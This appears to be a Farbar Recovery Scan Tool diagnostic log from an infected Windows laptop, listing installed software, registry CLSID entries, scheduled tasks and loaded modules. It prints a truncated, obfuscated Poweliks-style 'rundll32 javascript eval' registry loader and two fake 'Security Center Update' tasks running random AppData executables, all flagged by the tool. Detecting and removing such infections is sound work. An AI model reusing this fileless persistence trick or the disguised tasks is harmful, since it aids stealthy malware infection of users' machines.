ActiveState Komodo Edit 8.0.2 (HKLM-x32\...\{547E41FE-DFF8-42A2-BA26-D74FC3C4D4C0}) (Version: 8.0.2 - ActiveState Software Inc.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1030 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1030 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader X (10.1.11) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.11 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArtRage 4 (HKLM-x32\...\ArtRage 4 4.0.2.1) (Version: 4.0.2.1 - Ambient Design)
ArtRage 4 (x32 Version: 4.0.2.1 - Ambient Design) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.16 - Piriform)
CDisplay 1.8 (HKLM-x32\...\CDisplay_is1) (Version:  - dvd8n)
Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft)
Core FTP LE (HKLM-x32\...\CoreFTP) (Version:  - )
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4421.02 - CyberLink Corp.)
CyberLink PowerDVD 10 (x32 Version: 10.0.4421.02 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.27 - Dropbox, Inc.)
Easy File Share (HKLM-x32\...\{A7C37D4B-F37A-42E8-9B6A-B28C18AD4C12}) (Version: 1.3.4 - Samsung Electronics CO.,LTD.)
E-POP (HKLM-x32\...\{F06DD8D9-9DC8-430C-835C-C9BF21E05CC1}) (Version: 1.0.1 - Samsung Electronics CO., LTD.)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
ETDWare PS/2-X64 11.7.2.1_WHQL (HKLM\...\Elantech) (Version: 11.7.2.1 - ELAN Microelectronic Corp.)
ExpressCache (HKLM\...\{3EA6AB5D-D434-4ACA-9609-48F1319518EF}) (Version: 1.0.94 - Condusiv Technologies)
Fast Flash Sleep Resume (x32 Version: 1.1.1 - Samsung) Hidden
FileZilla Client 3.7.1 (HKLM-x32\...\FileZilla Client) (Version: 3.7.1 - FileZilla Project)
FocusWriter (HKLM-x32\...\FocusWriter) (Version: 1.5.1 - Graeme Gott)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Talk (remove only) (HKCU\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Grabber version 3.4.1 (HKLM-x32\...\{8C007AE6-3F7D-41CC-AB7C-75C08C276EC8}_is1) (Version: 3.4.1 - Bionus)
Help Desk (HKLM\...\{18BB06D9-8518-48E5-88F7-5AE1DF02546B}) (Version: 1.0.6 - Samsung Electronics CO., LTD.)
HxD Hex Editor version 1.7.7.0 (HKLM-x32\...\HxD Hex Editor_is1) (Version: 1.7.7.0 - Maël Hörz)
Intel AppUp® center (HKLM-x32\...\Intel AppUp(SM) center 33070) (Version: 41450 - Intel)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36702 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® PRO/Wireless Driver (Version: 16.01.5000.0577 - Intel Corporation) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{89478C31-5CE8-461A-9084-9A0AF059F84F}) (Version: 15.5.0.0344 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{7854AA22-A2F0-4F29-A2E9-D0C5A2B685E7}) (Version: 2.5.0.0248 - Motorola Solutions, Inc)
Intel® Rapid Start Technology (HKLM-x32\...\3D073343-CEEB-4ce7-85AC-A69A7631B5D6) (Version: 2.1.0.1002 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.2.1001 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{c9967fbd-e3c3-4ed0-992a-5b33260f2944}) (Version: 16.1.5 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (Version: 16.01.5000.0269 - Intel Corporation) Hidden
Intel® Trusted Connect Service Client (Version: 1.24.388.1 - Intel Corporation) Hidden
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Jarte 4.5 (HKLM-x32\...\Jarte_is1) (Version: 4.5 - Carolina Road Software L.L.C.)
Magic Set Editor 2.0.0 (HKLM-x32\...\Magic Set Editor 2_is1) (Version:  - )
Manga Studio (HKLM-x32\...\{CFA66508-B19D-4032-AB0A-EBBA2BDF1368}) (Version: 5.0.3 - Smith Micro)
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.5.0.28 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.2.3.51 - Symantec Corporation)
Norton Online Backup ARA (x32 Version: 4.1.0.14 - Symantec Corporation) Hidden
PaintTool SAI Ver.1 (HKLM-x32\...\PaintToolSAI) (Version:  - )
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plants vs. Zombies (HKLM-x32\...\Plants vs. Zombies) (Version:  - PopCap Games)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6699 - Realtek Semiconductor Corp.)
Recovery (HKLM-x32\...\{145DE957-0679-4A2A-BB5C-1D3E9808FAB2}) (Version: 6.0.6.5 - Samsung Electronics CO., LTD.)
Rosetta Stone Version 3 (HKLM-x32\...\{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}) (Version: 3.3.5.2 - Rosetta Stone Ltd.)
S Agent (Version: 1.0.7 - Samsung Electronics CO., LTD.) Hidden
Scrivener Update (HKLM-x32\...\Scrivener 1600) (Version: 1710 - Literature and Latte)
Settings (HKLM-x32\...\{52E5DE60-C96B-42CC-9A37-FE04725940AE}) (Version: 2.0.0 - Samsung Electronics CO., LTD.)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
Stencyl (HKLM-x32\...\Stencyl) (Version: 1.1.1 - Stencyl, LLC)
Support Center (HKLM\...\{73280CF7-9471-4FB6-B018-E5FD7A09F1AF}) (Version: 2.0.13 - Samsung Electronics CO., LTD.)
Support Center FAQ (x32 Version: 1.0.5 - Samsung Electronics CO., LTD.) Hidden
SW Update (HKLM-x32\...\{FF007847-0979-417F-8DD0-A2243DA724B9}) (Version: 2.0.21 - Samsung Electronics CO., LTD.)
Trojan Remover 6.9.1 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.1 - Simply Super Software)
Twine 1.3.5 (remove only) (HKLM-x32\...\Twine) (Version:  - )
Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{121C874E-5797-40B2-86CE-CE6624F2711A}) (Version: 15.0.1376 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{78CE66A9-85AF-4BD8-8FB7-35B5F3846C00}) (Version: 15.0.1215 - Microsoft Corporation)
Update for Microsoft Office 2010 (KB2494150) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version:  - Microsoft)
User Guide (HKLM-x32\...\{3453B656-241C-443B-BDEA-8682459B3FE8}) (Version: 1.2.00 - Samsung Electronics CO., LTD.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.2-1 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
WeSay 1.3.78 (HKLM-x32\...\{8BBEA8C0-A684-4265-8EFF-E2421CE2011A}) (Version: 1.3.78 - SIL)
Windows Driver Package - Samsung Electronics Co. Ltd. (RadioHIDMini) HIDClass  (07/27/2012 20.57.1.735) (HKLM\...\9F04C462DAB591BDCCE784F77E4D4F1736010B92) (Version: 07/27/2012 20.57.1.735 - Samsung Electronics Co. Ltd.)
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
Xerox PhotoCafe (HKLM-x32\...\Xerox PhotoCafe) (Version: 1.0.0.6162 - Xerox)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{092dfa86-5807-5a94-bf3b-5a53ba9e5308}\InprocServer32 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
19-08-2014 19:08:40 Windows Update
22-08-2014 22:44:55 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2012-07-26 01:26 - 2012-07-26 01:26 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0CB447B6-F6AC-4C53-9A9E-87F2CCB92AF6} - System32\Tasks\Security Center Update - 436866125 => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {1C125608-BA76-40CF-8FEA-F223DE03F06F} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-06-13] (Intel Corporation)
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {27075D08-B8C3-47C0-A54C-F3561298A87C} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-06-13] (Intel Corporation)
Task: {37DF2685-CD6F-4EDD-887B-9F06E6B17C5A} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {475346C3-7AF6-438F-A036-B9FB546408FC} - System32\Tasks\FFSRConfigurer => C:\Program Files (x86)\Samsung\Fast Flash Sleep Resume\FFSRConfigurer.exe [2012-08-22] (Samsung)
Task: {4A874836-A08E-4C6C-8941-DA85E9D89463} - System32\Tasks\Security Center Update - 406261607 => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
Task: {5D8D1AD1-9AF6-4608-92B0-19E3D602FBDA} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {64141CCE-D080-4267-A95A-4147DCBDB3BA} - System32\Tasks\SAgent => C:\Program Files\Samsung\S Agent\CommonAgent.exe [2012-08-17] (Samsung Electronics CO., LTD.)
Task: {6783C526-0787-4F6A-A925-C1A76DF446C0} - System32\Tasks\Settings => C:\Program Files (x86)\Samsung\Settings\sSettings.exe [2012-09-05] (Samsung Electronics CO., LTD.)
Task: {80BE2B4B-D4CD-46A1-9D81-F747B7AD5AF8} - System32\Tasks\Xerox PhotoCafe Communicator => C:\ProgramData\Xerox PhotoCafe\MessageCheck.exe [2011-10-26] ()
Task: {820335D9-ED62-45B0-8E4D-30E896223139} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\WSCStub.exe [2014-04-29] (Symantec Corporation)
Task: {84A39186-CC14-437B-95EB-48293836957D} - System32\Tasks\WLANStartup => C:\Program Files (x86)\Samsung\Easy Settings\WLANStartup.exe
Task: {944318E9-28B6-431A-BF73-CEC7B1FF6195} - System32\Tasks\Intel® Rapid Start Technology Manager => C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe [2012-07-19] (Intel)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {B73A7F30-9108-42D4-8A94-FDB2F113BAA8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-12-27] (Google Inc.)
Task: {BABDAC16-B61B-4E7E-9BD8-C4D6A8804C9C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-12-27] (Google Inc.)
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {C73AFC26-8403-4000-AA15-E51368A70321} - System32\Tasks\SWUpdateAgent => C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe [2012-10-05] (Samsung Electronics CO., LTD.)
Task: {CD97239A-27FB-4504-92EE-E7C0E18D2B5A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-07-23] (Piriform Ltd)
Task: {CF706EC0-C064-4E4C-8B97-79C85EA7DA93} - System32\Tasks\Absolute Reminder => C:\Program Files (x86)\Absolute Software\Absolute Reminder\AbsoluteReminder.exe [2012-05-23] (Absolute Software)
Task: {E3419A0C-2866-4648-BE92-EBECE0962389} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {EB6E4E82-C5A5-44A4-AAC7-BFF95768B4DA} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {FBBD6220-84A3-4D31-A726-709537F7FAC9} - System32\Tasks\advRecovery => C:\Program Files\Samsung\Recovery\WCScheduler.exe [2012-09-16] (SEC)
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Security Center Update - 406261607.job => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe <==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 436866125.job => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe <==== ATTENTION
Task: C:\windows\Tasks\Xerox PhotoCafe Communicator.job => C:\ProgramData\Xerox PhotoCafe\MessageCheck.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-09-05 03:50 - 2012-09-05 03:50 - 00085112 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
2010-01-09 21:17 - 2010-01-09 21:17 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\office.odf
2010-01-21 02:40 - 2010-01-21 02:40 - 08794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-05-14 16:18 - 2012-12-11 13:07 - 01184640 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
2012-08-17 05:44 - 2012-08-16 00:24 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00211064 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WinCRT.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00028792 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdWrapper.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 01012856 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmd.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00110712 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsBase.dll
